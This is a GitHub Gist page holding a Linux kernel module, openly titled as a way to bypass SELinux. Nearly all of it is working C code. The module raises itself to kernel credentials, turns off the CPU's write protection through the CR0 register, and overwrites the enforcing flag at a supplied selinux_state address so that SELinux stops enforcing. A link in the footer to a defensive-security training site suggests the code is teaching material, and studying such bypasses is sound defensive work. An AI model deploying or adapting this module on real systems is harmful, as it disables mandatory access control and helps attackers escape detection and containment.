Created
May 20, 2025 09:43
-
-
Save cr0nx/343b5b73e74ed7d945b7a2650cdffa9b to your computer and use it in GitHub Desktop.
Bypassing SELinux secure_mode_policyload with LKM
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/cred.h> | |
| #include <asm/processor.h> | |
| #define LOG_TAG "[EDRmetry] " | |
| // Define a simplified selinux_state structure (only the enforcing field) | |
| struct selinux_state { | |
| int enforcing; | |
| // Other fields omitted for simplicity | |
| }; | |
| // Module parameter for selinux_state address | |
| static unsigned long selinux_state_addr; | |
| module_param(selinux_state_addr, ulong, 0644); | |
| MODULE_PARM_DESC(selinux_state_addr, "Address of selinux_state structure"); | |
| static int sp_kmod_init(void) | |
| { | |
| struct selinux_state *state; | |
| unsigned long cr0; | |
| printk(KERN_INFO LOG_TAG "SELinux disabler kernel module loaded\n"); | |
| // Escalate privileges to bypass restrictions | |
| if (commit_creds(prepare_kernel_cred(NULL))) { | |
| printk(KERN_ALERT LOG_TAG "Failed to set kernel credentials\n"); | |
| return -EPERM; | |
| } | |
| // Check if address was provided | |
| if (!selinux_state_addr) { | |
| printk(KERN_ALERT LOG_TAG "selinux_state address not provided\n"); | |
| return -EINVAL; | |
| } | |
| // Basic validation: ensure address is non-zero and in kernel space | |
| if (selinux_state_addr < 0xffffffff80000000UL) { | |
| printk(KERN_ALERT LOG_TAG "Invalid selinux_state address: 0x%lx (not in kernel space)\n", selinux_state_addr); | |
| return -EINVAL; | |
| } | |
| state = (struct selinux_state *)selinux_state_addr; | |
| // Check current SELinux state | |
| printk(KERN_INFO LOG_TAG "Current selinux_state.enforcing value: %d\n", state->enforcing); | |
| // Disable SELinux enforcing mode | |
| if (state->enforcing != 0) { | |
| // Disable write protection | |
| cr0 = read_cr0(); | |
| write_cr0(cr0 & ~0x10000); // Clear WP bit | |
| state->enforcing = 0; | |
| write_cr0(cr0); // Restore WP | |
| printk(KERN_INFO LOG_TAG "[SUCCESS] Set selinux_state.enforcing to 0\n"); | |
| } else { | |
| printk(KERN_INFO LOG_TAG "SELinux already in permissive mode\n"); | |
| } | |
| return 0; | |
| } | |
| static void sp_kmod_exit(void) | |
| { | |
| printk(KERN_INFO LOG_TAG "SELinux disabler kernel module unloaded\n"); | |
| } | |
| module_init(sp_kmod_init); | |
| module_exit(sp_kmod_exit); | |
| MODULE_LICENSE("GPL"); | |
| MODULE_AUTHOR("DS"); | |
| MODULE_ALIAS("SELinux_Disable"); | |
| MODULE_DESCRIPTION("SELinux disabler"); |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Find more interesting stuff here: https://edu.defensive-security.com/